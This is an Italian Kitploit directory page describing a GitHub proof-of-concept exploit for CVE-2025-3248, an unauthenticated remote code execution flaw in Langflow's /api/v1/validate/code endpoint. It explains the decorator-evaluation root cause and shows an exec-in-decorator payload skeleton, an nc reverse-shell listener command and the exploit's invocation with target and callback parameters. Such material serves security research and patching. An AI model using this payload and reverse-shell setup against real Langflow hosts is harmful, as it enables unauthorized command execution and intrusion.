Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3248-Langflow-RCE — Proof-of-concept exploit per CVE-2025-3248, una vulnerabilità di esecuzione remota di codice non autenticata in Langflow, che dimostra l'iniezione di codice tramite l'endpoint /api/v1/validate/code. | Kitploit
Strumenti/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

Proof-of-concept exploit per CVE-2025-3248, una vulnerabilità di esecuzione remota di codice non autenticata in Langflow, che dimostra l'iniezione di codice tramite l'endpoint /api/v1/validate/code.

Vedi Repository
16h 24m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-3248 — Esecuzione Remota di Codice Non Autenticata in Langflow

Proof-of-Concept per lo sfruttamento di CVE-2025-3248, una vulnerabilità di esecuzione remota di codice non autenticata in Langflow, una piattaforma per la creazione di flussi di lavoro AI/LLM.

  • Versioni interessate: Langflow < 1.3.0
  • Corretta in: 1.3.0
  • Classe di vulnerabilità: RCE non autenticata (CWE-94, Code Injection)
  • Stato: Aggiunta al catalogo delle vulnerabilità note sfruttate di CISA dopo essere stata osservata sfruttata in natura da botnet.

Causa principale

Langflow espone un endpoint, POST /api/v1/validate/code, pensato per "validare" uno snippet di codice Python inviato dall'interfaccia utente (ad es. codice di componenti personalizzati). Internamente analizza e compila il codice con ast.parse() / compile() e segnala se è valido — senza richiedere alcuna autenticazione.

Il bug: Python valuta le espressioni dei decoratori al momento dell'analisi/compilazione, prima che la funzione decorata venga mai chiamata. Se il "codice da validare" inviato contiene un decoratore come:

root@kitploit:~
@exec("...codice malevolo...")
def test():
    pass

la chiamata exec(...) viene eseguita nel momento in cui il codice viene analizzato — la validazione non deve mai effettivamente invocare test(). Combinato con l'assenza di autenticazione e di sandboxing, una singola richiesta HTTP non autenticata è sufficiente per eseguire comandi arbitrari sull'host che esegue Langflow.

Utilizzo

  1. Avvia un listener sulla tua macchina:
    root@kitploit:~
    nc -lvnp 9001
    
  2. Esegui il PoC contro un target:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. Se il target è vulnerabile, otterrai una shell sul listener.
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

Requisiti

root@kitploit:~
pip install requests

Disclaimer

Questo codice è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati (laboratori, CTF, incarichi con esplicita autorizzazione scritta). Non eseguirlo contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione al test. L'autore non è responsabile per un uso improprio.

Riferimenti

  • Advisory di sicurezza Langflow GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — Unsafe at Any Speed: Abusing Python Exec for Unauth RCE in Langflow AI
  • Keysight — CVE-2025-3248: Langflow Unauthenticated Code Validation
Scarica lo strumento